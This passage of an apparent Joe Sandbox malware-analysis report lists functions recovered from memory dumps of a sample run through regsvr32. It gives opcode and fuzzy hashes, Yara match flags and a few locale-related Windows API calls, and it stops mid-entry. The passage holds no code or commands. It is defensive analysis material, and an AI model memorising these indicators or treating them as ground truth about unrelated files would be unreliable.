                                                                      • String ID: {H2}$}i#c
                                                                      • API String ID: 0-1724349491
                                                                      • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                      • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                      • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                      • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4V$so
                                                                      • API String ID: 0-1060102820
                                                                      • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                      • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                      • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                      • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: F+'$O$
                                                                      • API String ID: 0-4064122715
                                                                      • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                      • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                      • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                      • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$bO6
                                                                      • API String ID: 0-3242911120
                                                                      • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                      • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                      • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                      • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )j-J$\rba
                                                                      • API String ID: 0-105394296
                                                                      • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                      • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                      • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                      • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5T$7c
                                                                      • API String ID: 0-2666566123
                                                                      • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                      • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                      • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                      • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ",)x$PX
                                                                      • API String ID: 0-926260526
                                                                      • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                      • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                      • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                      • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                      • Instruction ID: 36d7a2703d270d8837218463388f200c481518927d1596947a901957922758cc
                                                                      • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                      • Instruction Fuzzy Hash: FE119833A08586C5FA705B65ECA13B913D0EB86788F4C8431DA8D86A89CFACE546D314
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                      • Instruction ID: c6df65eee797d80633042929ce35807400f60a9c62f2d246e94d2e9497c2ed84
                                                                      • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                      • Instruction Fuzzy Hash: FE112E73E08605C6FB188B31C8663792AD0FB96B09F1C8435C60D46ACACFBCD594A685
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFA526A5A8C), ref: 00007FFA526AC8FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                      • Instruction ID: e4b356e8cc52ce642f3f79bab6792aa1653a7a2353b6fc51f6951d0d29e4a928
                                                                      • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                      • Instruction Fuzzy Hash: 3EF08C63E08506CAFB188B35C8263BA26D1FB96B48F1CC031C64D42A8ACFACD591A241
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale_getptd
                                                                      • String ID:
                                                                      • API String ID: 3731964398-0
                                                                      • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                      • Instruction ID: 3fe68f8785d76eb807760e24f6b931c54e77daf861cd6cdd2d821c18bd8414d6
                                                                      • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                      • Instruction Fuzzy Hash: 29F05E22A186C083D7118B1AF44415AE7A1FBC5BE0F588221EA9D17F9DCF6CC896CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                      • Instruction ID: 33a1dc6ccfa0e8e606c21389b8800ec4cee889f1be3ce6e5826193f419f28beb
                                                                      • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                      • Instruction Fuzzy Hash: 3BE06D21A1C681C1F6309720EC513AA37D0FF9A758F888231DA9D46EA9DFACE2559B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                      • Instruction ID: 949756e798081e37e0839643056498297ff1aaab0c52d4cfdf688d34e31a245c
                                                                      • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                      • Instruction Fuzzy Hash: 56E08667E0564582EB088B61DC9537426D1EF95B09F0CC031CA1C41599CFFCC596C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: cYte
                                                                      • API String ID: 0-489798635
                                                                      • Opcode ID: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                      • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                      • Opcode Fuzzy Hash: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                      • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Pc
                                                                      • API String ID: 0-2609325410
                                                                      • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                      • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                      • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                      • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g >
                                                                      • API String ID: 0-3862707646
                                                                      • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                      • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                      • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                      • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2
                                                                      • API String ID: 0-2012265552
                                                                      • Opcode ID: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                      • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                      • Opcode Fuzzy Hash: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                      • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Wcl
                                                                      • API String ID: 0-2623992880
                                                                      • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                      • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                      • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                      • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ws8
                                                                      • API String ID: 0-2196714860
                                                                      • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                      • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                      • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                      • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p/g
                                                                      • API String ID: 0-1786412500
                                                                      • Opcode ID: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                      • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                      • Opcode Fuzzy Hash: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                      • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %
                                                                      • API String ID: 0-3714942587
                                                                      • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                      • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                      • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                      • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: A.}
                                                                      • API String ID: 0-2880059976
                                                                      • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                      • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                      • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                      • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0#
                                                                      • API String ID: 0-456275806
                                                                      • Opcode ID: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                      • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                      • Opcode Fuzzy Hash: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                      • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: n)
                                                                      • API String ID: 0-1227437150
                                                                      • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                      • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                      • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                      • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H&0
                                                                      • API String ID: 0-1691334370
                                                                      • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                      • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                      • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                      • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <+o
                                                                      • API String ID: 0-2035106886
                                                                      • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                      • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                      • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                      • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2d
                                                                      • API String ID: 0-3866551247
                                                                      • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                      • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                      • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                      • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ZF{;
                                                                      • API String ID: 0-2351138993
                                                                      • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                      • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                      • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                      • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
